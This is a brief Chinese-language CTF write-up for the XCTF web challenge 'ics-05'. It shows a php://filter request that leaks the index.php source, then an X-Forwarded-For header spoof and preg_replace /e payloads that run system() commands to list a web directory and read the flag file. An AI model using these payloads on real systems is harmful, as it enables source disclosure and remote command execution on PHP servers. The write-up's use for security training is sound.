XCTF--WEB ics-05

XCTF–WEB ics-05

我们点开链接我们一顿乱点。发信啊只有个设备维护中心可以点开。如是乎,我们进去看看。
XCTF--WEB ics-05_第1张图片我们查看到源码发现存在href="?page=index" 于是使用phpfile一波读取。?page=php://filter/read=convert.base64-encode/resource=index.php
XCTF--WEB ics-05_第2张图片得到一串base64我们进行解码。
XCTF--WEB ics-05_第3张图片XCTF--WEB ics-05_第4张图片
pattern参数的结尾包含了/e修正符的话,如果replacement构成合法的代码的话便会执行,先在请求头中加入X-Forwarded-For: 127.0.0.1,payload:?pat=/test/e&rep=system(‘ls%20/var/www/html’)&sub=test
XCTF--WEB ics-05_第5张图片
payload:?pat=/test/e&rep=system(‘cat%20/var/www/html/s3chahahaDir/flag/flag.php’)&sub=test获取flag

XCTF--WEB ics-05_第6张图片

你可能感兴趣的:(CTF)